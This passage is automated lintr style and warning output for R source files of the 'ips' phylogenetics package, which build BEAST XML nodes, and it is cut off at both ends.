^\n```\n[R/assembleDistributionNode.R:20:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:21:8:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L21) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n       ^\n```\n[R/assembleDistributionNode.R:21:27:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L21) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n                          ^\n```\n[R/assembleDistributionNode.R:22:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleDistributionNode.R:25:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleDistributionNode.R:26:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​    d <- xmlNode(\"distribution\", \n                                ^\n```\n[R/assembleDistributionNode.R:27:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L27) *style:* **Lines should not be more than 80 characters.**\n```r\n​                 attrs = c(birthDiffRate = paste(\"@birthRate.t:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:31:14:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L31) *warning:* **no visible global function definition for ‘addChildren’**\n```r\n​    prior <- addChildren(prior, kids = list(d))\n             ^~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:32:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleDistributionNode.R:33:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L33) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i > 1 ) {\n        ^\n```\n[R/assembleDistributionNode.R:33:15:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L33) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i > 1 ) {\n              ^\n```\n[R/assembleDistributionNode.R:34:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L34) *warning:* **no visible global function definition for ‘xmlAttrs<-’**\n```r\n​      xmlAttrs(u) <- c(id = paste(\"Uniform.0\", u.step, sep = \"\"))\n      ^~~~~~~~\n```\n[R/assembleDistributionNode.R:35:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L35) *style:* **Variable or function name should be snake_case.**\n```r\n​      u.step <- u.step + 1\n      ^~~~~~\n```\n[R/assembleDistributionNode.R:36:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/assembleDistributionNode.R:42:16:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L42) *warning:* **no visible global function definition for ‘addChildren’**\n```r\n​      prior <- addChildren(prior, kids = list(p))\n               ^~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:43:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/assembleDistributionNode.R:44:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L44) *warning:* **no visible global function definition for ‘xmlAttrs<-’**\n```r\n​      xmlAttrs(u) <- c(id = paste(\"Uniform.0\", u.step, sep = \"\"))\n      ^~~~~~~~\n```\n[R/assembleDistributionNode.R:45:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L45) *style:* **Variable or function name should be snake_case.**\n```r\n​      u.step <- u.step + 1\n      ^~~~~~\n```\n[R/assembleDistributionNode.R:52:14:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L52) *warning:* **no visible global function definition for ‘addChildren’**\n```r\n​    prior <- addChildren(prior, kids = list(p))\n             ^~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:53:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L53) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleDistributionNode.R:56:5:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L56) *style:* **Variable or function name should be snake_case.**\n```r\n​    siteModel <- xmlNode(\n    ^~~~~~~~~\n```\n[R/assembleDistributionNode.R:57:19:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L57) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \"siteModel\", \n                  ^\n```\n[R/assembleDistributionNode.R:62:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L62) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                         id = paste(\"mutationRate.s:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:66:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L66) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                         id = paste(\"gammaShape.s:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:68:51:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​                       xmlNode(\"parameter\", \"0.0\", \n                                                  ^\n```\n[R/assembleDistributionNode.R:70:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L70) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                         id = paste(\"proportionInvariant.s:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:74:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L74) *style:* **Lines should not be more than 80 characters.**\n```r\n​                       xmlNode(\"substModel\", attrs = c(id = paste(\"JC69.s:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:75:60:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​                                                       spec=\"JukesCantor\"))))\n                                                          ~^~\n```\n[R/assembleDistributionNode.R:76:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L76) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i == 1){\n        ^\n```\n[R/assembleDistributionNode.R:77:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L77) *style:* **Variable or function name should be snake_case.**\n```r\n​      branchRateModel <- xmlNode(\n      ^~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:81:36:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​        xmlNode(\"parameter\", \"1.0\", \n                                   ^\n```\n[R/assembleDistributionNode.R:86:7:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L86) *style:* **Variable or function name should be snake_case.**\n```r\n​      branchRateModel <- xmlNode(\n      ^~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:92:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L92) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleDistributionNode.R:100:19:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L100) *warning:* **no visible global function definition for ‘addChildren’**\n```r\n​    likelihood <- addChildren(likelihood, kids = list(distribution))\n                  ^~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:102:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L102) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:103:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L103) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:104:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L104) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:106:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L106) *style:* **Commented code should be removed.**\n```r\n​  #     ts <- lapply(taxonset, rbeauti.taxonset, id = id)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:107:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L107) *style:* **Commented code should be removed.**\n```r\n​  #     prior.distribution <- addChildren(prior.distribution, kids = ts)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleDistributionNode.R:109:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L109) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:110:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L110) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleDistributionNode.R:111:26:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  xmlNode(\"distribution\", \n                         ^\n```\n[R/assembleDistributionNode.R:115:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleDistributionNode.R#L115) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleInitNode.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleInitNode.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​assembleInitNode <- function(id){\n^~~~~~~~~~~~~~~~\n```\n[R/assembleInitNode.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleInitNode.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleInitNode.R:6:43:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleInitNode.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​  parameter <- xmlNode(\"parameter\", \"1.0\", \n                                          ^\n```\n[R/assembleInitNode.R:9:3:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleInitNode.R#L9) *style:* **Variable or function name should be snake_case.**\n```r\n​  populationModel <- xmlNode(\"populationModel\",\n  ^~~~~~~~~~~~~~~\n```\n[R/assembleInitNode.R:10:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleInitNode.R#L10) *style:* **Lines should not be more than 80 characters.**\n```r\n​                             attrs = c(id = paste(\"ConstantPopulation0.t:\", id, sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleInitNode.R:13:18:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleInitNode.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​  xmlNode(\"init\", \n                 ^\n```\n[R/assembleInitNode.R:20:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleInitNode.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleLoggers.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​assembleLoggers <- function(id){\n^~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleLoggers.R:8:32:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​  tracelog <- xmlNode(\"logger\", \n                               ^\n```\n[R/assembleLoggers.R:14:47:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​                                          sort=\"smart\"),\n                                             ~^~\n```\n[R/assembleLoggers.R:19:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L19) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleLoggers.R:22:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  screenlog <- xmlNode(\"logger\", \n                                ^\n```\n[R/assembleLoggers.R:24:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L24) *style:* **Lines should not be more than 80 characters.**\n```r\n​                       .children = list(xmlNode(\"log\", attrs = c(idref = \"posterior\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:30:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleLoggers.R:32:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleLoggers.R:33:8:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L33) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n       ^\n```\n[R/assembleLoggers.R:33:27:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L33) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n                          ^\n```\n[R/assembleLoggers.R:34:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleLoggers.R:38:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L38) *style:* **Lines should not be more than 80 characters.**\n```r\n​      xmlNode(\"log\", attrs = c(idref = paste(\"treeLikelihood.\", id[i], sep = \"\"))),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:42:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i > 1 ){\n        ^\n```\n[R/assembleLoggers.R:42:15:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( i > 1 ){\n              ^\n```\n[R/assembleLoggers.R:44:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L44) *style:* **Lines should not be more than 80 characters.**\n```r\n​        xmlNode(\"parameter\", attrs = c(idref = paste(\"clockRate.c:\", id[i], sep = \"\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:44:87:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​        xmlNode(\"parameter\", attrs = c(idref = paste(\"clockRate.c:\", id[i], sep = \"\"), \n                                                                                      ^\n```\n[R/assembleLoggers.R:49:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L49) *style:* **Lines should not be more than 80 characters.**\n```r\n​      xmlNode(\"parameter\", attrs = c(idref = paste(\"birthRate.t:\", id[i], sep = \"\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:49:85:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​      xmlNode(\"parameter\", attrs = c(idref = paste(\"birthRate.t:\", id[i], sep = \"\"), \n                                                                                    ^\n```\n[R/assembleLoggers.R:51:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/assembleLoggers.R:53:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L53) *style:* **Lines should not be more than 80 characters.**\n```r\n​#       tslog <- lapply(taxonset, function(x) xmlNode(\"log\", attrs = c(idref = paste(x$id, \".prior\", sep = \"\"))))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:53:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L53) *style:* **Commented code should be removed.**\n```r\n​#       tslog <- lapply(taxonset, function(x) xmlNode(\"log\", attrs = c(idref = paste(x$id, \".prior\", sep = \"\"))))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:54:9:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L54) *style:* **Commented code should be removed.**\n```r\n​#       logger1 <- addChildren(logger1, kids = tslog)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:59:5:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L59) *style:* **Variable or function name should be snake_case.**\n```r\n​    this.treelog <- xmlNode(\"logger\", \n    ^~~~~~~~~~~~\n```\n[R/assembleLoggers.R:59:38:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​    this.treelog <- xmlNode(\"logger\", \n                                     ^\n```\n[R/assembleLoggers.R:61:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L61) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                id = paste(\"treelog.t:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:64:60:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L64) *style:* **Trailing whitespace is superfluous.**\n```r\n​                            .children = list(xmlNode(\"log\", \n                                                           ^\n```\n[R/assembleLoggers.R:65:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L65) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                     attrs = c(id = paste(\"TreeWithMetaDataLogger.t:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:66:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L66) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                                      spec = \"beast.evolution.tree.TreeWithMetaDataLogger\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleLoggers.R:67:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleLoggers.R#L67) *style:* **Lines should not be more than 80 characters.**\n```r\n​                                                                      tree = paste(\"@Tree.t:\", id[i], sep = \"\")))))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:4:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​assembleOperators <- function(id){\n^~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:5:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/assembleOperators.R:7:8:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L7) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n       ^\n```\n[R/assembleOperators.R:7:27:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L7) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  for ( i in seq_along(id) ){\n                          ^\n```\n[R/assembleOperators.R:8:5:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L8) *style:* **Variable or function name should be snake_case.**\n```r\n​    this.ops <- list(\n    ^~~~~~~~\n```\n[R/assembleOperators.R:9:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                ^\n```\n[R/assembleOperators.R:10:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L10) *style:* **Lines should not be more than 80 characters.**\n```r\n​                     attrs = c(id = paste(\"YuleBirthRateScaler.t:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:11:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L11) *style:* **Lines should not be more than 80 characters.**\n```r\n​                               parameter = paste(\"@birthRate.t:\", id[i], sep = \"\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:15:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                ^\n```\n[R/assembleOperators.R:21:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                ^\n```\n[R/assembleOperators.R:28:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L28) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                ^\n```\n[R/assembleOperators.R:29:1:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L29) *style:* **Lines should not be more than 80 characters.**\n```r\n​                     attrs = c(id = paste(\"UniformOperator.t:\", id[i], sep = \"\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/assembleOperators.R:29:82:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L29) *style:* **Trailing whitespace is superfluous.**\n```r\n​                     attrs = c(id = paste(\"UniformOperator.t:\", id[i], sep = \"\"), \n                                                                                 ^\n```\n[R/assembleOperators.R:33:33:](https://github.com/richelbilderbeek/ips/blob/c13725ff75073a46403e85b43522c1cbc973367d/R/assembleOperators.R#L33) *style:* **Trailing whitespace is superfluous.**\n```r\n​             xmlNode(\"operator\", \n                                